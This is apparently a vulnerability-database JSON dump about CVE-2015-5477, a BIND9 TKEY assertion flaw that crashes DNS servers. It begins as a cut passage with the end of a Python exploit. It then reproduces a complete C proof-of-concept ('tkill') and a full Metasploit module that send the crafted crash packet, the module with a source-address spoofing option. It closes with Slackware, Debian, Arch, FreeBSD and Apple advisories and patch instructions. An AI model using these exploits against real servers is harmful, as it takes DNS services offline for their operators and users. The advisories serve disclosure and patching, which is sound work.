08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n \r\nprint('Done.')\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/23970", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T23:28:39", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "zdt", "title": "BIND9 - TKEY PoC Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T00:00:00", "id": "1337DAY-ID-23948", "href": "https://0day.today/exploit/description/23948", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n \r\n Usage:\r\n tkill <hostname>\r\n \r\n What it does:\r\n - First sends a \"version\" query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n \r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n \r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n \r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Anther way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n \r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n \r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n \r\n The patch was to set the variable to NULL before the second lookup.\r\n \r\n The correct fix would simply not check to see if the parameter\r\n was NULL to be begin with. It's an out-only parameter, so it's value\r\n on input doesn't matter.\r\n \r\n This is a just a \"brainfart\" bug that can only result in a crash\r\n of the server. It cann't result in data-corruption or code\r\n execution.\r\n \r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n \r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the simularities.\r\n \r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\nSource: https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n \r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n \r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n \r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n \r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n \r\n \r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n */\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x00, /* no additional */\r\n \r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHOAS */\r\n};\r\n \r\n \r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n \r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n \r\n \r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n \r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n \r\n /*\r\n * Handle respoonse code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n \r\n \r\n i = 12; /* skip header */\r\n \r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n \r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n \r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n \r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n \r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n \r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n \r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n \r\n /* print the strings */\r\n {\r\n int j = i;\r\n \r\n i += len;\r\n \r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n \r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", buf[k]);\r\n }\r\n \r\n j = k;\r\n \r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n \r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n \r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n \r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n \r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n \r\n \r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n \r\n \r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n \r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n \r\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n \r\n \r\n closesocket(fd);\r\n}\r\n \r\n \r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n \r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n \r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n \r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n \r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n \r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n \r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = target->ai_next) {\r\n char newtarget[256];\r\n \r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n \r\n probe(target);\r\n printf(\"\\n\");\r\n }\r\n \r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/23948", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T07:04:09", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.#### Usage Info\nmsf > use auxiliary/dos/dns/bind_tkey\rmsf auxiliary(bind_tkey) > show actions\r...actions...\rmsf auxiliary(bind_tkey) > set ACTION <action-name>\rmsf auxiliary(bind_tkey) > show options\r...show and set options...\rmsf auxiliary(bind_tkey) > run", "cvss3": {}, "published": "2015-08-04T00:00:00", "type": "zdt", "title": "BIND9 TKEY Query Denial of Service Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-04T00:00:00", "id": "1337DAY-ID-23960", "href": "https://0day.today/exploit/description/23960", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'BIND TKEY Query Denial of Service',\r\n 'Description' => %q{\r\n This module sends a malformed TKEY query, which exploits an\r\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\r\n As a result, a vulnerable named server will exit with a REQUIRE\r\n assertion failure. This condition can be exploited in versions of BIND\r\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\r\n through 9.10.2-P2.\r\n },\r\n 'Author' => [\r\n 'Jonathan Foote', # Original discoverer\r\n 'throwawayokejxqbbif', # PoC\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2015-5477'],\r\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\r\n ['URL', 'https://kb.isc.org/article/AA-01272'],\r\n ['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']\r\n ],\r\n 'DisclosureDate' => 'Jul 28 2015',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof', nil])\r\n ])\r\n\r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n\r\n def scan_host(ip)\r\n if datastore['SRC_ADDR']\r\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\r\n else\r\n print_status(\"Sending packet to #{ip}\")\r\n scanner_send(payload, ip, rport)\r\n end\r\n end\r\n\r\n def payload\r\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\r\n\r\n name_length = [name.length].pack('C')\r\n txt_length = [txt.length].pack('C')\r\n data_length = [txt.length + 1].pack('n')\r\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\r\n\r\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\r\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query << \"\\x00\\x01\" # Questions: 1\r\n query << \"\\x00\\x00\" # Answer RRs: 0\r\n query << \"\\x00\\x00\" # Authority RRs: 0\r\n query << \"\\x00\\x01\" # Additional RRs: 1\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\r\n query << \"\\x00\\x01\" # Class: IN (0x0001)\r\n\r\n query << name_length # [Name Length]\r\n query << name # Name\r\n query << \"\\x00\" # [End of name]\r\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\r\n query << \"\\x00\\x01\" # Class: IN (0x0001)\r\n query << ttl # Time to live\r\n query << data_length # Data length\r\n query << txt_length # TXT Length\r\n query << txt # TXT\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/23960", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2021-07-28T14:46:46", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz: Upgraded.\n This update fixes a security issue where an error in the handling of TKEY\n queries can be exploited by an attacker for use as a denial-of-service\n vector, as a constructed packet can use the defect to trigger a REQUIRE\n assertion failure, causing BIND to exit.\n Impact:\n Both recursive and authoritative servers are vulnerable to this defect.\n Additionally, exposure is not prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling, before checks enforcing those boundaries.\n Operators should take steps to upgrade to a patched version as soon as\n possible.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n https://kb.isc.org/article/AA-01272\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.7_P2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.7_P2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.7_P2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.7_P2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2_P3-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2_P3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n6a7f7bbc83fd3d189d1e43f672deb33d bind-9.9.7_P2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n3b8306bfbec7ff968762ab5c38e7d419 bind-9.9.7_P2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ncfb8dfe797158a769697c261f2e5114c bind-9.9.7_P2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n417b3bb461e5fd5aae6b671fd584a1ae bind-9.9.7_P2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ndf46b76823c598beb2d0f47f2b6a9813 bind-9.9.7_P2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nb17f5230240b9a0738e2066897b09a40 bind-9.9.7_P2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nc9f9074c811f470009e6dda97dc5ff68 bind-9.9.7_P2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n578d63e26fee2783502f0828dc3d491c bind-9.9.7_P2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9e27701833bd20df42e25418ffa8fdca bind-9.9.7_P2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n4b9c8c11a38c28ca2f12e8f97e3763c6 bind-9.9.7_P2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nc47d83f7a7b31902e802df3b72d1e902 n/bind-9.10.2_P3-i586-1.txz\n\nSlackware x86_64 -current package:\nc95fcfd95ed0261a2dedee90432f34c7 n/bind-9.10.2_P3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.9.7_P2-i486-1_slack14.1.txz\n\nThen, restart the name server:\n > /etc/rc.d/rc.bind restart", "cvss3": {}, "published": "2015-07-28T19:38:44", "type": "slackware", "title": "[slackware-security] bind", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T19:38:44", "id": "SSA-2015-209-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debiancve": [{"lastseen": "2022-05-18T23:31:42", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-29T14:59:00", "type": "debiancve", "title": "CVE-2015-5477", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T14:59:00", "id": "DEBIANCVE:CVE-2015-5477", "href": "https://security-tracker.debian.org/tracker/CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet leading to denial of service.", "edition": 2, "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "archlinux", "title": "bind: denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ASA-201507-22", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-July/000376.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nISC reports:\n\nAn error in the handling of TKEY queries can be exploited\n\t by an attacker for use as a denial-of-service vector, as a constructed\n\t packet can use the defect to trigger a REQUIRE assertion failure,\n\t causing BIND to exit.\n\n\n", "cvss3": {}, "published": "2015-07-21T00:00:00", "type": "freebsd", "title": "bind -- denial of service vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-08-09T00:00:00", "id": "731CDEAA-3564-11E5-9970-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/731cdeaa-3564-11e5-9970-14dae9d210b8.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:00", "description": "\r\n\r\nAPPLE-SA-2015-08-13-4 OS X Server v4.1.5\r\n\r\nOS X Server v4.1.5 is now available and addresses the following:\r\n\r\nBIND\r\nAvailable for: OS X Yosemite v10.10.5 or later\r\nImpact: A remote attacker may be able to cause a denial of service\r\nDescription: An assertion issue existed in the handling of TKEY\r\npackets. This issue was addressed by updating BIND to version\r\n9.9.7-P2.\r\nCVE-ID\r\nCVE-2015-5477\r\n\r\n\r\nOS X Server v4.1.5 may be obtained from the Mac App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-17T00:00:00", "title": "APPLE-SA-2015-08-13-4 OS X Server v4.1.5", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32391", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32391", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, 